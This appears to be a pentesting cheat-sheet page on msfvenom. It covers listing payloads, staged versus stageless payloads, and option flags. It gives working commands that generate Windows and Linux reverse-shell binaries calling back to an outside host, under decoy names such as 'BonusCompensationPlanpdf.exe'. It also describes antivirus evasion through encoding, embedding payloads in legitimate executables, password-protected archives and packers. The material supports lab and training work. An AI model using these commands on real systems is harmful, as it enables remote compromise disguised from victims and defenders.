search

msfvenom

hashtag
Listing Payloads

msfvenom -l payloads

hashtag
Staged vs Stageless payloads

windows/meterpreter/reverse_tcp vs windows/meterpreter_reverse_tcp

The former is staged, after the architecture each / is a stage. The latter doesn't have a / after the meterpreter part, so it's stageless

hashtag
Creating a payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf

  • -p build payload

  • -f output format

hashtag
List options

msfvenom -p java/jsp_shell_reverse_tcp --list-options

hashtag
Basic msfvenom

One can also use the -a to specify the architecture or the --platform Listing

hashtag
Common params when creating a shellcode

hashtag
Encoding

  • -b for bad bytes

  • -e encoding

hashtag
Antivirus evasion

Hiding payload inside of legitimate executables

  • -i iterations of encoding

  • -k continue with normal execution

  • -x input file to embed the payload into

  • -o output file

hashtag
Archiving

use multiple zip/rar/compression layers with passwords to evade detection on the network

hashtag
Packing

A list of popular packer software:

UPX packerarrow-up-right

The Enigma Protectorarrow-up-right

MPRESSarrow-up-right

Alternate EXE Packer

ExeStealth

Morphine

MEW

Themida

Also see PolyPackarrow-up-right.

PreviousMetasploitNextCustom compiled files

Last updated